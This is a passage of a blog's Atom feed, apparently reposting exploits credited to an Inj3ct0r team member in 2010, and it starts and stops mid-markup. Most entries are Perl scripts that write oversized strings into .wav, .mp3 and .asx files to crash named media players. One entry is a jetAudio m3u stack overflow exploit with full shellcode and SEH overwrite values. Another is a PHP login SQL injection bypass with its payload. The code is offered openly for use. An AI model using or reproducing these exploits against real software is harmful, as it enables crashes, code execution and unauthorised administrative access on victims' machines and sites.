src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-3045500081960328236</id><published>2010-03-04T10:16:00.003-08:00</published><updated>2010-03-04T10:16:57.432-08:00</updated><title type='text'>KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#########################################################&lt;br /&gt;## Usage--&gt;&gt;file created--&gt;&gt;load file--&gt;&gt;b00m.wav &gt;&gt;&gt;BOOM&lt;br /&gt;#########################################################&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;print "#####################################################\n";&lt;br /&gt;print "[!] KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC\n";&lt;br /&gt;print "#####################################################\n";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;my $boom = "http://"."\x41" x 1337;&lt;br /&gt;my $filename = "b00m.wav";&lt;br /&gt;open (FILE,"&gt;$filename");&lt;br /&gt;print FILE "$boom";&lt;br /&gt;print "\nFile successfully created!\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-3045500081960328236?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/3045500081960328236/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/kol-waveiox-104-wav-local-buffer.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3045500081960328236'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/3045500081960328236'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/kol-waveiox-104-wav-local-buffer.html' title='KOL WaveIOX 1.04 (.wav) Local Buffer Overflow PoC'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-986169224488394241</id><published>2010-03-04T10:16:00.001-08:00</published><updated>2010-03-04T10:16:35.579-08:00</updated><title type='text'>KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#########################################################&lt;br /&gt;## Usage--&gt;&gt;file created--&gt;&gt;load file--&gt;&gt;b00m.wav &gt;&gt;&gt;BOOM&lt;br /&gt;#########################################################&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;print "#####################################################\n";&lt;br /&gt;print "[!] KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC\n";&lt;br /&gt;print "#####################################################\n";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;my $boom = "http://"."\x41" x 1337;&lt;br /&gt;my $filename = "b00m.wav";&lt;br /&gt;open (FILE,"&gt;$filename");&lt;br /&gt;print FILE "$boom";&lt;br /&gt;print "\nFile successfully created!\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-986169224488394241?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/986169224488394241/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/kol-wave-player-10-wav-local-buffer.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/986169224488394241'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/986169224488394241'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/kol-wave-player-10-wav-local-buffer.html' title='KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-7656907278591178489</id><published>2010-03-04T10:15:00.002-08:00</published><updated>2010-03-04T10:16:14.055-08:00</updated><title type='text'>yPlay 1.0.76 (.mp3) Local Crash PoC</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#########################################################&lt;br /&gt;## Usage--&gt;&gt;file created--&gt;&gt;load file--&gt;&gt;b00m.mp3 &gt;&gt;&gt;BOOM&lt;br /&gt;#########################################################&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;print "#####################################################\n";&lt;br /&gt;print "[!] yPlay 1.0.76 (.mp3) Local Crash PoC\n";&lt;br /&gt;print "\n";&lt;br /&gt;print "[!] Author: cr4wl3r\n";&lt;br /&gt;print "#####################################################\n";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;my $boom = "A" x 1337;&lt;br /&gt;my $filename = "b00m.mp3";&lt;br /&gt;open (FILE,"&gt;$filename");&lt;br /&gt;print FILE "$boom";&lt;br /&gt;print "\nFile successfully created!\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7656907278591178489?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/7656907278591178489/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/yplay-1076-mp3-local-crash-poc.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7656907278591178489'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7656907278591178489'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/yplay-1076-mp3-local-crash-poc.html' title='yPlay 1.0.76 (.mp3) Local Crash PoC'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-5548396314296513622</id><published>2010-03-04T10:15:00.001-08:00</published><updated>2010-03-04T10:15:49.981-08:00</updated><title type='text'>Pico MP3 Player 1.0 (.mp3 /.pls File) Local Crash PoC</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#########################################################&lt;br /&gt;## Usage--&gt;&gt;file created--&gt;&gt;load file--&gt;&gt;b00m.mp3 &gt;&gt;&gt;BOOM&lt;br /&gt;#########################################################&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;print "#####################################################\n";&lt;br /&gt;print "[!] Pico MP3 Player 1.0 (.mp3) Local Crash PoC\n";&lt;br /&gt;print "\n";&lt;br /&gt;print "#####################################################\n";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;my $boom = "A" x 1337;&lt;br /&gt;my $filename = "b00m.mp3";&lt;br /&gt;open (FILE,"&gt;$filename");&lt;br /&gt;print FILE "$boom";&lt;br /&gt;print "\nFile successfully created!\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-5548396314296513622?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/5548396314296513622/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/pico-mp3-player-10-mp3-pls-file-local.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5548396314296513622'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/5548396314296513622'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/pico-mp3-player-10-mp3-pls-file-local.html' title='Pico MP3 Player 1.0 (.mp3 /.pls File) Local Crash PoC'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-4836077935164055934</id><published>2010-03-04T10:14:00.002-08:00</published><updated>2010-03-04T10:15:21.879-08:00</updated><title type='text'>jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;my $file="b00m.m3u";&lt;br /&gt; &lt;br /&gt;my $header = "http://";&lt;br /&gt;my $junk = "A" x 1017;&lt;br /&gt;my $nseh = "\xeb\x06\x90\x90"; &lt;br /&gt;my $seh = pack('V',0x01221045);&lt;br /&gt; &lt;br /&gt;my $shellcode =&lt;br /&gt;"\x33\xC9\x83\xE9\xB0\xD9\xEE\xD9\x74\x24\xF4\x5B\x81\x73\x13".&lt;br /&gt;"\xA8\x45\xF5\xB8\x83\xEB\xFC\xE2\xF4\x54\x2F\x1E\xF5\x40\xBC".&lt;br /&gt;"\x0A\x47\x57\x25\x7E\xD4\x8C\x61\x7E\xFD\x94\xCE\x89\xBD\xD0".&lt;br /&gt;"\x44\x1A\x33\xE7\x5D\x7E\xE7\x88\x44\x1E\xF1\x23\x71\x7E\xB9".&lt;br /&gt;"\x46\x74\x35\x21\x04\xC1\x35\xCC\xAF\x84\x3F\xB5\xA9\x87\x1E".&lt;br /&gt;"\x4C\x93\x11\xD1\x90\xDD\xA0\x7E\xE7\x8C\x44\x1E\xDE\x23\x49".&lt;br /&gt;"\xBE\x33\xF7\x59\xF4\x53\xAB\x69\x7E\x31\xC4\x61\xE9\xD9\x6B".&lt;br /&gt;"\x74\x2E\xDC\x23\x06\xC5\x33\xE8\x49\x7E\xC8\xB4\xE8\x7E\xF8".&lt;br /&gt;"\xA0\x1B\x9D\x36\xE6\x4B\x19\xE8\x57\x93\x93\xEB\xCE\x2D\xC6".&lt;br /&gt;"\x8A\xC0\x32\x86\x8A\xF7\x11\x0A\x68\xC0\x8E\x18\x44\x93\x15".&lt;br /&gt;"\x0A\x6E\xF7\xCC\x10\xDE\x29\xA8\xFD\xBA\xFD\x2F\xF7\x47\x78".&lt;br /&gt;"\x2D\x2C\xB1\x5D\xE8\xA2\x47\x7E\x16\xA6\xEB\xFB\x16\xB6\xEB".&lt;br /&gt;"\xEB\x16\x0A\x68\xCE\x2D\x35\xB8\xCE\x16\x7C\x59\x3D\x2D\x51".&lt;br /&gt;"\xA2\xD8\x82\xA2\x47\x7E\x2F\xE5\xE9\xFD\xBA\x25\xD0\x0C\xE8".&lt;br /&gt;"\xDB\x51\xFF\xBA\x23\xEB\xFD\xBA\x25\xD0\x4D\x0C\x73\xF1\xFF".&lt;br /&gt;"\xBA\x23\xE8\xFC\x11\xA0\x47\x78\xD6\x9D\x5F\xD1\x83\x8C\xEF".&lt;br /&gt;"\x57\x93\xA0\x47\x78\x23\x9F\xDC\xCE\x2D\x96\xD5\x21\xA0\x9F".&lt;br /&gt;"\xE8\xF1\x6C\x39\x31\x4F\x2F\xB1\x31\x4A\x74\x35\x4B\x02\xBB".&lt;br /&gt;"\xB7\x95\x56\x07\xD9\x2B\x25\x3F\xCD\x13\x03\xEE\x9D\xCA\x56".&lt;br /&gt;"\xF6\xE3\x47\xDD\x01\x0A\x6E\xF3\x12\xA7\xE9\xF9\x14\x9F\xB9".&lt;br /&gt;"\xF9\x14\xA0\xE9\x57\x95\x9D\x15\x71\x40\x3B\xEB\x57\x93\x9F".&lt;br /&gt;"\x47\x57\x72\x0A\x68\x23\x12\x09\x3B\x6C\x21\x0A\x6E\xFA\xBA".&lt;br /&gt;"\x25\xD0\x47\x8B\x15\xD8\xFB\xBA\x23\x47\x78\x45\xF5\xB8";&lt;br /&gt; &lt;br /&gt; &lt;br /&gt;my $footer="E" x (2000-length(junk.nseh.seh.shellcode));&lt;br /&gt; &lt;br /&gt;my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer;&lt;br /&gt; &lt;br /&gt;print " Writing payload to file\n";&lt;br /&gt; &lt;br /&gt;open(sploitf,"&gt;$file");&lt;br /&gt;print sploitf $payload;&lt;br /&gt;close(sploitf);&lt;br /&gt;print " Exploit file " . b00m . " created\n";&lt;br /&gt;print " b00m " . length($payload) . " bytes\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4836077935164055934?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/4836077935164055934/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/jetaudio-8002-basic-m3u-stack-overflow.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4836077935164055934'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4836077935164055934'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/jetaudio-8002-basic-m3u-stack-overflow.html' title='jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-426988869943996070</id><published>2010-03-04T10:14:00.001-08:00</published><updated>2010-03-04T10:14:52.182-08:00</updated><title type='text'>jetAudio 8.0.0.2 Basic Local Crash Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;&lt;br /&gt;my $file= "crash.asx";&lt;br /&gt; &lt;br /&gt;my $boom= "http://"."AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;&lt;br /&gt; &lt;br /&gt;open($FILE,"&gt;&gt;$file");&lt;br /&gt; &lt;br /&gt;print $FILE "$boom";&lt;br /&gt; &lt;br /&gt;close($FILE);&lt;br /&gt; &lt;br /&gt;print "Done..!~#\n";&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-426988869943996070?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/426988869943996070/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/jetaudio-8002-basic-local-crash-exploit.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/426988869943996070'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/426988869943996070'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/jetaudio-8002-basic-local-crash-exploit.html' title='jetAudio 8.0.0.2 Basic Local Crash Exploit'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-7038350200048825854</id><published>2010-03-04T10:13:00.002-08:00</published><updated>2010-03-04T10:14:23.961-08:00</updated><title type='text'>al3jeb script Remote Login Bypass Exploit</title><content type='html'># 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0&lt;br /&gt;# 0     _                   __           __       __                     1&lt;br /&gt;# 1   /' \            __  /'__`\        /\ \__  /'__`\                   0&lt;br /&gt;# 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1&lt;br /&gt;# 1  \/_/\ \ /' _ `\ \/\ \/_/_\_&lt;_  /'___\ \ \/\ \ \ \ \/\`'__\          0&lt;br /&gt;# 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1&lt;br /&gt;# 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0&lt;br /&gt;# 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1&lt;br /&gt;# 1                  \ \____/ &gt;&gt; Exploit database separated by exploit   0&lt;br /&gt;# 0                   \/___/          type (local, remote, DoS, etc.)    1&lt;br /&gt;# 1                                                                      1&lt;br /&gt;# 0  [+] Site            : Inj3ct0r.com                                  0&lt;br /&gt;# 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1&lt;br /&gt;# 0                                                                      0&lt;br /&gt;# 1                    ######################################            1&lt;br /&gt;# 0                    I'm cr4wl3r  member from Inj3ct0r Team            1&lt;br /&gt;# 1                    ######################################            0&lt;br /&gt;# 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1&lt;br /&gt;&lt;br /&gt;#[+] Discovered By: cr4wl3r&lt;br /&gt;include("Connections/config.php");&lt;br /&gt;if(isset($_POST['Submit']))&lt;br /&gt;{&lt;br /&gt; $u=$_POST["uname"];&lt;br /&gt; $p=$_POST["pwd"];&lt;br /&gt; $r=mysql_query("select * from admins where AdminName='$u' and AdminPass='$p'");&lt;br /&gt;  &lt;br /&gt;if($row=mysql_fetch_array($r))&lt;br /&gt;{&lt;br /&gt; $_SESSION['AdminName']=$u;&lt;br /&gt; if(isset($re))&lt;br /&gt; {&lt;br /&gt; setcookie("username",$u,time()+3600);&lt;br /&gt; }&lt;br /&gt; header("location:index.php");&lt;br /&gt;  &lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;[!] PoC: [al3jebscript]/login.php&lt;br /&gt; &lt;br /&gt;    username : ' or '1=1&lt;br /&gt;    password : cr4wl3r&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7038350200048825854?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/7038350200048825854/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2010/03/al3jeb-script-remote-login-bypass.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7038350200048825854'/><link 